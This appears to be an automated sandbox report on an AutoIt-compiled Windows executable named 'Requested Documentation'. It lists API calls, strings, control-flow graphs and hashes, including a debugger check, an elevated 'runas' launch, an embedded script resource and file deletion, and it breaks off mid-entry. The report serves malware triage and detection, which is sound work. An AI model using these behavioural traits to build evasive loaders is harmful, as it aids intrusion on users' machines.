983416 59 API calls 2 library calls 106800->106805 106801->106793 106806 9835b0 106802->106806 106805->106800 106807 9835bd 106806->106807 106808 9835a1 106806->106808 106807->106808 106809 9835c4 RegOpenKeyExW 106807->106809 106808->106800 106809->106808 106810 9835de RegQueryValueExW 106809->106810 106811 9835ff 106810->106811 106812 983614 RegCloseKey 106810->106812 106811->106812 106812->106808 106813 981016 106818 984974 106813->106818 106816 9a2d40 __cinit 67 API calls 106817 981025 106816->106817 106819 9a0db6 Mailbox 59 API calls 106818->106819 106821 98497c 106819->106821 106820 98101b 106820->106816 106821->106820 106825 984936 106821->106825 106826 98493f 106825->106826 106827 984951 106825->106827 106828 9a2d40 __cinit 67 API calls 106826->106828 106829 9849a0 106827->106829 106828->106827 106830 987667 59 API calls 106829->106830 106831 9849b8 GetVersionExW 106830->106831 106832 987bcc 59 API calls 106831->106832 106833 9849fb 106832->106833 106834 987d2c 59 API calls 106833->106834 106843 984a28 106833->106843 106835 984a1c 106834->106835 106836 987726 59 API calls 106835->106836 106836->106843 106837 984a93 GetCurrentProcess IsWow64Process 106838 984aac 106837->106838 106840 984b2b GetSystemInfo 106838->106840 106841 984ac2 106838->106841 106839 9bd864 106842 984af8 106840->106842 106853 984b37 106841->106853 106842->106820 106843->106837 106843->106839 106846 984b1f GetSystemInfo 106848 984ae9 106846->106848 106847 984ad4 106849 984b37 2 API calls 106847->106849 106848->106842 106851 984aef FreeLibrary 106848->106851 106850 984adc GetNativeSystemInfo 106849->106850 106850->106848 106851->106842 106854 984ad0 106853->106854 106855 984b40 LoadLibraryA 106853->106855 106854->106846 106854->106847 106855->106854 106856 984b51 GetProcAddress 106855->106856 106856->106854 106857 981066 106862 98f76f 106857->106862 106859 98106c 106860 9a2d40 __cinit 67 API calls 106859->106860 106861 981076 106860->106861 106863 98f790 106862->106863 106895 99ff03 106863->106895 106867 98f7d7 106868 987667 59 API calls 106867->106868 106869 98f7e1 106868->106869 106870 987667 59 API calls 106869->106870 106871 98f7eb 106870->106871 106872 987667 59 API calls 106871->106872 106873 98f7f5 106872->106873 106874 987667 59 API calls 106873->106874 106875 98f833 106874->106875 106876 987667 59 API calls 106875->106876 106877 98f8fe 106876->106877 106905 995f87 106877->106905 106881 98f930 106882 987667 59 API calls 106881->106882 106883 98f93a 106882->106883 106933 99fd9e 106883->106933 106885 98f981 106886 98f991 GetStdHandle 106885->106886 106887 98f9dd 106886->106887 106888 9c45ab 106886->106888 106889 98f9e5 OleInitialize 106887->106889 106888->106887 106890 9c45b4 106888->106890 106889->106859 106940 9e6b38 64 API calls Mailbox 106890->106940 106892 9c45bb 106941 9e7207 CreateThread 106892->106941 106894 9c45c7 CloseHandle 106894->106889 106942 99ffdc 106895->106942 106898 99ffdc 59 API calls 106899 99ff45 106898->106899 106900 987667 59 API calls 106899->106900 106901 99ff51 106900->106901 106902 987bcc 59 API calls 106901->106902 106903 98f796 106902->106903 106904 9a0162 6 API calls 106903->106904 106904->106867 106906 987667 59 API calls 106905->106906 106907 995f97 106906->106907 106908 987667 59 API calls 106907->106908 106909 995f9f 106908->106909 106949 995a9d 106909->106949 106912 995a9d 59 API calls 106913 995faf 106912->106913 106914 987667 59 API calls 106913->106914 106915 995fba 106914->106915 106916 9a0db6 Mailbox 59 API calls 106915->106916 106917 98f908 106916->106917 106918 9960f9 106917->106918 106919 996107 106918->106919 106920 987667 59 API calls 106919->106920 106921 996112 106920->106921 106922 987667 59 API calls 106921->106922 106923 99611d 106922->106923 106924 987667 59 API calls 106923->106924 106925 996128 106924->106925 106926 987667 59 API calls 106925->106926 106927 996133 106926->106927 106928 995a9d 59 API calls 106927->106928 106929 99613e 106928->106929 106930 9a0db6 Mailbox 59 API calls 106929->106930 106931 996145 RegisterWindowMessageW 106930->106931 106931->106881 106934 9d576f 106933->106934 106935 99fdae 106933->106935 106952 9e9ae7 60 API calls 106934->106952 106937 9a0db6 Mailbox 59 API calls 106935->106937 106939 99fdb6 106937->106939 106938 9d577a 106939->106885 106940->106892 106941->106894 106953 9e71ed 65 API calls 106941->106953 106943 987667 59 API calls 106942->106943 106944 99ffe7 106943->106944 106945 987667 59 API calls 106944->106945 106946 99ffef 106945->106946 106947 987667 59 API calls 106946->106947 106948 99ff3b 106947->106948 106948->106898 106950 987667 59 API calls 106949->106950 106951 995aa5 106950->106951 106951->106912 106952->106938

                                                                              Executed Functions

                                                                              Function 00983B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B68
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00983B7A
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A452F8,00A452E0,?,?), ref: 00983BEB
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                                • Part of subcall function 0099092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983C14,00A452F8,?,?,?), ref: 0099096E
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00983C6F
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A37770,00000010), ref: 009BD281
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00A452F8,?,?,?), ref: 009BD2B9
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A34260,00A452F8,?,?,?), ref: 009BD33F
                                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 009BD346
                                                                                • Part of subcall function 00983A46: GetSysColorBrush.USER32(0000000F), ref: 00983A50
                                                                                • Part of subcall function 00983A46: LoadCursorW.USER32(00000000,00007F00), ref: 00983A5F
                                                                                • Part of subcall function 00983A46: LoadIconW.USER32(00000063), ref: 00983A76
                                                                                • Part of subcall function 00983A46: LoadIconW.USER32(000000A4), ref: 00983A88
                                                                                • Part of subcall function 00983A46: LoadIconW.USER32(000000A2), ref: 00983A9A
                                                                                • Part of subcall function 00983A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AC0
                                                                                • Part of subcall function 00983A46: RegisterClassExW.USER32(?), ref: 00983B16
                                                                                • Part of subcall function 009839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A03
                                                                                • Part of subcall function 009839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A24
                                                                                • Part of subcall function 009839D5: ShowWindow.USER32(00000000,?,?), ref: 00983A38
                                                                                • Part of subcall function 009839D5: ShowWindow.USER32(00000000,?,?), ref: 00983A41
                                                                                • Part of subcall function 0098434A: _memset.LIBCMT ref: 00984370
                                                                                • Part of subcall function 0098434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00984415
                                                                              Strings
                                                                              • This is a third-party compiled AutoIt script., xrefs: 009BD279
                                                                              • runas, xrefs: 009BD33A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                              • API String ID: 529118366-3287110873
                                                                              • Opcode ID: 19d1c4ffff04a1ddd59a1a6bb315e1a484593091c687c9bba2c8d759e548b81b
                                                                              • Instruction ID: f80f4873316e6aef7d3d30176818bee6a6dc5ccc0c54796f9baec0f611ffd47e
                                                                              • Opcode Fuzzy Hash: 19d1c4ffff04a1ddd59a1a6bb315e1a484593091c687c9bba2c8d759e548b81b
                                                                              • Instruction Fuzzy Hash: 4251D479D04148AFDF11FBF4DC05AEDBB78AFC5710F108466F861B6262DAA18606CB21
                                                                              Function 009849A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 996 9849a0-984a00 call 987667 GetVersionExW call 987bcc 1001 984b0b-984b0d 996->1001 1002 984a06 996->1002 1004 9bd767-9bd773 1001->1004 1003 984a09-984a0e 1002->1003 1006 984b12-984b13 1003->1006 1007 984a14 1003->1007 1005 9bd774-9bd778 1004->1005 1009 9bd77b-9bd787 1005->1009 1010 9bd77a 1005->1010 1008 984a15-984a4c call 987d2c call 987726 1006->1008 1007->1008 1018 984a52-984a53 1008->1018 1019 9bd864-9bd867 1008->1019 1009->1005 1012 9bd789-9bd78e 1009->1012 1010->1009 1012->1003 1014 9bd794-9bd79b 1012->1014 1014->1004 1016 9bd79d 1014->1016 1020 9bd7a2-9bd7a5 1016->1020 1018->1020 1021 984a59-984a64 1018->1021 1022 9bd869 1019->1022 1023 9bd880-9bd884 1019->1023 1024 9bd7ab-9bd7c9 1020->1024 1025 984a93-984aaa GetCurrentProcess IsWow64Process 1020->1025 1030 9bd7ea-9bd7f0 1021->1030 1031 984a6a-984a6c 1021->1031 1032 9bd86c 1022->1032 1026 9bd86f-9bd878 1023->1026 1027 9bd886-9bd88f 1023->1027 1024->1025 1033 9bd7cf-9bd7d5 1024->1033 1028 984aac 1025->1028 1029 984aaf-984ac0 1025->1029 1026->1023 1027->1032 1036 9bd891-9bd894 1027->1036 1028->1029 1037 984b2b-984b35 GetSystemInfo 1029->1037 1038 984ac2-984ad2 call 984b37 1029->1038 1034 9bd7fa-9bd800 1030->1034 1035 9bd7f2-9bd7f5 1030->1035 1039 984a72-984a75 1031->1039 1040 9bd805-9bd811 1031->1040 1032->1026 1041 9bd7df-9bd7e5 1033->1041 1042 9bd7d7-9bd7da 1033->1042 1034->1025 1035->1025 1036->1026 1043 984af8-984b08 1037->1043 1053 984b1f-984b29 GetSystemInfo 1038->1053 1054 984ad4-984ae1 call 984b37 1038->1054 1047 984a7b-984a8a 1039->1047 1048 9bd831-9bd834 1039->1048 1044 9bd81b-9bd821 1040->1044 1045 9bd813-9bd816 1040->1045 1041->1025 1042->1025 1044->1025 1045->1025 1049 984a90 1047->1049 1050 9bd826-9bd82c 1047->1050 1048->1025 1052 9bd83a-9bd84f 1048->1052 1049->1025 1050->1025 1055 9bd859-9bd85f 1052->1055 1056 9bd851-9bd854 1052->1056 1057 984ae9-984aed 1053->1057 1061 984b18-984b1d 1054->1061 1062 984ae3-984ae7 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1057->1043 1060 984aef-984af2 FreeLibrary 1057->1060 1060->1043 1061->1062 1062->1057
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 009849CD
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • GetCurrentProcess.KERNEL32(?,00A0FAEC,00000000,00000000,?), ref: 00984A9A
                                                                              • IsWow64Process.KERNEL32(00000000), ref: 00984AA1
                                                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00984AE7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00984AF2
                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00984B23
                                                                              • GetSystemInfo.KERNEL32(00000000), ref: 00984B2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                              • String ID:
                                                                              • API String ID: 1986165174-0
                                                                              • Opcode ID: dab521f94f10f41c685d45a4a4a0a5b8b9982f26442f6e00452f029d7c0fddd9
                                                                              • Instruction ID: 1f8882c2d7c78cd5516172a501ecfd22d355b0926425121ad4861cf8b85c30df
                                                                              • Opcode Fuzzy Hash: dab521f94f10f41c685d45a4a4a0a5b8b9982f26442f6e00452f029d7c0fddd9
                                                                              • Instruction Fuzzy Hash: BF91E33198A7C1DECB35EB7885501EAFFF9AF2A310B444DAED0CA97B41D224E508C759
                                                                              Function 00984E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1063 984e89-984ea1 CreateStreamOnHGlobal 1064 984ec1-984ec6 1063->1064 1065 984ea3-984eba FindResourceExW 1063->1065 1066 9bd933-9bd942 LoadResource 1065->1066 1067 984ec0 1065->1067 1066->1067 1068 9bd948-9bd956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 9bd95c-9bd967 LockResource 1068->1069 1069->1067 1070 9bd96d-9bd975 1069->1070 1071 9bd979-9bd98b 1070->1071 1071->1067
                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00984D8E,?,?,00000000,00000000), ref: 00984E99
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00984D8E,?,?,00000000,00000000), ref: 00984EB0
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F), ref: 009BD937
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F), ref: 009BD94C
                                                                              • LockResource.KERNEL32(00984D8E,?,?,00984D8E,?,?,00000000,00000000,?,?,?,?,?,?,00984E2F,00000000), ref: 009BD95F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: 9e4ebb08bb5b259a3478a555a2163dac727685dfd3cab7f822441d06b419d8a1
                                                                              • Instruction ID: c3a4467092d5d7d6b33523a2d414e7111e112958c5edcf66f3c73c0d4e1c9bc9
                                                                              • Opcode Fuzzy Hash: 9e4ebb08bb5b259a3478a555a2163dac727685dfd3cab7f822441d06b419d8a1
                                                                              • Instruction Fuzzy Hash: 38119E70240705BFD7209BA5EC48F677BBEFFC9B11F104268F40596650EB71E8028660
                                                                              Function 009E445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,009BE398), ref: 009E446A
                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 009E447B
                                                                              • FindClose.KERNEL32(00000000), ref: 009E448B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
                                                                              • Instruction ID: 4712d84c5534b094203feaf42ccea1721f4889b78d2971d0dafd29261a7ab8d9
                                                                              • Opcode Fuzzy Hash: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
                                                                              • Instruction Fuzzy Hash: F5E0D8325105456B8620EB79EC0D4E977DC9E09335F100715F935D14E0F7745D019596
                                                                              Function 0098E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Variable must be of type 'Object'., xrefs: 009C3E62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Variable must be of type 'Object'.
                                                                              • API String ID: 0-109567571
                                                                              • Opcode ID: 6ba7c13b808beb25f10420f5823fa76488de16088b4000408e96e697f2b0c80a
                                                                              • Instruction ID: 974a50c32cf3605e6377904eefd3c2c5681b34ac0894d867b99988fbb71158a2
                                                                              • Opcode Fuzzy Hash: 6ba7c13b808beb25f10420f5823fa76488de16088b4000408e96e697f2b0c80a
                                                                              • Instruction Fuzzy Hash: FDA2AC74E00209CFCB24EF94C4A0AAEB7B5FF99314F248469E906AB351D775ED42CB91
                                                                              Function 009909D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990A5B
                                                                              • timeGetTime.WINMM ref: 00990D16
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990E53
                                                                              • Sleep.KERNEL32(0000000A), ref: 00990E61
                                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 00990EFA
                                                                              • DestroyWindow.USER32 ref: 00990F06
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00990F20
                                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 009C4E83
                                                                              • TranslateMessage.USER32(?), ref: 009C5C60
                                                                              • DispatchMessageW.USER32(?), ref: 009C5C6E
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009C5C82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                              • API String ID: 4212290369-3242690629
                                                                              • Opcode ID: 2356395ebe1b6a7786ddbc244d6d2b44a368d166dd683a566d653f624cd9a3fc
                                                                              • Instruction ID: c4195b4ac7df4c7478099bb0530c519cfbe908b05786fe052639c5b767771901
                                                                              • Opcode Fuzzy Hash: 2356395ebe1b6a7786ddbc244d6d2b44a368d166dd683a566d653f624cd9a3fc
                                                                              • Instruction Fuzzy Hash: ACB2CF70A08741DFDB24DF24C884FAAB7E8BFC5304F14491DE49A972A1DB75E885CB92
                                                                              Function 009E9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 009E8F5F: __time64.LIBCMT ref: 009E8F69
                                                                                • Part of subcall function 00984EE5: _fseek.LIBCMT ref: 00984EFD
                                                                              • __wsplitpath.LIBCMT ref: 009E9234
                                                                                • Part of subcall function 009A40FB: __wsplitpath_helper.LIBCMT ref: 009A413B
                                                                              • _wcscpy.LIBCMT ref: 009E9247
                                                                              • _wcscat.LIBCMT ref: 009E925A
                                                                              • __wsplitpath.LIBCMT ref: 009E927F
                                                                              • _wcscat.LIBCMT ref: 009E9295
                                                                              • _wcscat.LIBCMT ref: 009E92A8
                                                                                • Part of subcall function 009E8FA5: _memmove.LIBCMT ref: 009E8FDE
                                                                                • Part of subcall function 009E8FA5: _memmove.LIBCMT ref: 009E8FED
                                                                              • _wcscmp.LIBCMT ref: 009E91EF
                                                                                • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9824
                                                                                • Part of subcall function 009E9734: _wcscmp.LIBCMT ref: 009E9837
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E9452
                                                                              • _wcsncpy.LIBCMT ref: 009E94C5
                                                                              • DeleteFileW.KERNEL32(?,?), ref: 009E94FB
                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009E9511
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E9522
                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E9534
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1500180987-0
                                                                              • Opcode ID: a1024b4e896f4d06e06818020a89e90e592c1cc1a7547037d328a59b8c36858e
                                                                              • Instruction ID: 8aba3b5c7a67a9921c112295e6cef86888e10fb413dbb99504efe44e43297889
                                                                              • Opcode Fuzzy Hash: a1024b4e896f4d06e06818020a89e90e592c1cc1a7547037d328a59b8c36858e
                                                                              • Instruction Fuzzy Hash: 70C14CB1D00219AADF21DF95CC85ADEB7BDEF99310F0040AAF609E7251EB309E458F65
                                                                              Function 00983015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00983074
                                                                              • RegisterClassExW.USER32(00000030), ref: 0098309E
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                                                                              • LoadIconW.USER32(000000A9), ref: 009830F2
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                              • API String ID: 2914291525-1005189915
                                                                              • Opcode ID: 2f9d361ec2cdabb20402b8cee3dee16c6bba6784a897eb921a250e7adab184f4
                                                                              • Instruction ID: d5db27bb18910e536cfe2f07ca0de0a0f4b79c4ee8c3bfc521c6801151a986d4
                                                                              • Opcode Fuzzy Hash: 2f9d361ec2cdabb20402b8cee3dee16c6bba6784a897eb921a250e7adab184f4
                                                                              • Instruction Fuzzy Hash: D13125B9841349AFDB20CFE4E889A89BBF0FB09710F14452EE580A62A1DBB50586CF51
                                                                              Function 00983041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00983074
                                                                              • RegisterClassExW.USER32(00000030), ref: 0098309E
                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                                                                              • LoadIconW.USER32(000000A9), ref: 009830F2
                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
